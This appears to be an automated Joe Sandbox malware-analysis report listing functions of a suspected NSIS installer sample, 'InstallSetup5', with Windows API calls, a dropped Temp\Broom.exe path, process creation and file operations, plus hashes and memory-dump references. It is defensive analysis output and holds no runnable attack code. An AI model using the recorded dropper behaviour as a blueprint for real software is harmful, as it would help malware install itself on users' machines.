Function 00401774 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B5
CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\Broom.exe,C:\Users\user\AppData\Local\Temp\Broom.exe,00000000,00000000,C:\Users\user\AppData\Local\Temp\Broom.exe,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017DA

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,00426903,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00426903,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 004017A3
C:\Users\user\AppData\Local\Temp\Broom.exe, xrefs: 00401792, 0040179B, 004017A8, 004017BA, 004017C6, 004017FC, 00401812, 00401830, 0040186C, 004018ED, 004018F6, 00401900, 0040190B
C:\Users\user\AppData\Local\Temp, xrefs: 0040183A, 00401856

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\Broom.exe
API String ID: 1941528284-733011491
Opcode ID: 2e80ac3c5f2a430d828697df6b1c0cc1dc37c10f5fd59b308a4190c5f51c851e
Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
Opcode Fuzzy Hash: 2e80ac3c5f2a430d828697df6b1c0cc1dc37c10f5fd59b308a4190c5f51c851e
Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D

Uniqueness

Uniqueness Score: -1.00%

Function 004068DB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
wsprintfW.USER32 ref: 0040692D
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406941

Strings

%s%S.dll, xrefs: 00406927
UXTHEME, xrefs: 004068E4

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME
API String ID: 2200240437-1106614640
Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406076 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00406094
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C), ref: 004060AF

Strings

nsa, xrefs: 00406083
C:\Users\user\AppData\Local\Temp\, xrefs: 0040607B

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1857211195
Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768

Uniqueness

Uniqueness Score: -1.00%

Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405ED1: CharNextW.USER32(?,?,0042F270,?,00405F45,0042F270,0042F270, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F

Part of subcall function 00405AAB: CreateDirectoryW.KERNEL32(00437800,?), ref: 00405AED

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 00401652

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401645

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 1892508949-1104044542
Opcode ID: 04e0d5993f268d170d316adf500480e0df0f6d42439d873a7858c5bb752ae6a4
Instruction ID: 6fd3d265dcb44280b24f8e6f21651466162e19908bb00ba525d5af3adea1cd3c
Opcode Fuzzy Hash: 04e0d5993f268d170d316adf500480e0df0f6d42439d873a7858c5bb752ae6a4
Instruction Fuzzy Hash: F211E231404104ABCF206FA5CD0159F36B0EF04368B25493FE945B22F1DA3D4A81DA5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
Instruction ID: 0adee223d2b7ba7d815a442a2885e1f2b60e3b86eb1a18037e9b6c54a102055c
Opcode Fuzzy Hash: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
Instruction Fuzzy Hash: 0E01FF31620220AFE7195B389E05B6B3698E710329F10863FF851F62F1EA78DC429B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00405B3A Relevance: 3.0, APIs: 2, Instructions: 24
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
Instruction ID: b1032d8704f3223f2a9afbe03a7757fefc60a77e8ecf1711bb84520e71ece662
Opcode Fuzzy Hash: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
Instruction Fuzzy Hash: 91E09AB4600219BFEB109B74AD06F7B767CE704604F408475BD15E2151D774A8158A78

Uniqueness

Uniqueness Score: -1.00%

Function 0040694B Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
GetProcAddress.KERNEL32(00000000,?), ref: 00406978

Part of subcall function 004068DB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
Part of subcall function 004068DB: wsprintfW.USER32 ref: 0040692D
Part of subcall function 004068DB: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406941

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction ID: ff64ee7455e026c1647d72c339307a336527f79dacb59e64982fca04d7429b22
Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction Fuzzy Hash: 38E08673504210AFD61057705D04D27B3A89F85740302443EF946F2140DB34DC32ABA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406047 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(00000003,004030C2,00442800,80000000,00000003), ref: 0040604B
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15

Uniqueness

Uniqueness Score: -1.00%

Function 00406022 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction ID: 97cbb32404f08d1f6fed837f871d2b37f55cf766f9720be9b575451f5cdabe77
Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction Fuzzy Hash: A3D0C972504220AFC2102728AE0889BBB55EB542717028A35FCA9A22B0CB304CA68694

Uniqueness

Uniqueness Score: -1.00%

Function 00405B05 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B19

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction ID: 8c4969e502f5bc4c8dfdefb7e9c2ba363b64d1215f12130c86bef4ebeef6f559
Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction Fuzzy Hash: 19C08C30310902DACA802B209F087173960AB80340F158439A683E00B4CA30A065C92D

Uniqueness

Uniqueness Score: -1.00%

Function 004060CA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E7,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060DE

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction ID: a77d82ba430c16999eb1f2306cb11816df14181100402a9e04059793f1b3015d
Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction Fuzzy Hash: 21E08632150219ABCF10DF948C00EEB3B9CFF04390F018436FD11E3040D630E92197A4

Uniqueness

Uniqueness Score: -1.00%

Function 004060F9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040349D,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040610D

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction ID: 78408803ccc59d93ae5352641a5e7b8f709900c8df5e8e9e13d69f82a1dcf02f
Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction Fuzzy Hash: 8FE08C3220021ABBCF109E908C00EEB3FACEB003A0F014432FA26E6050D670E83097A4

Uniqueness

Uniqueness Score: -1.00%

Function 004034EA Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034F8

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
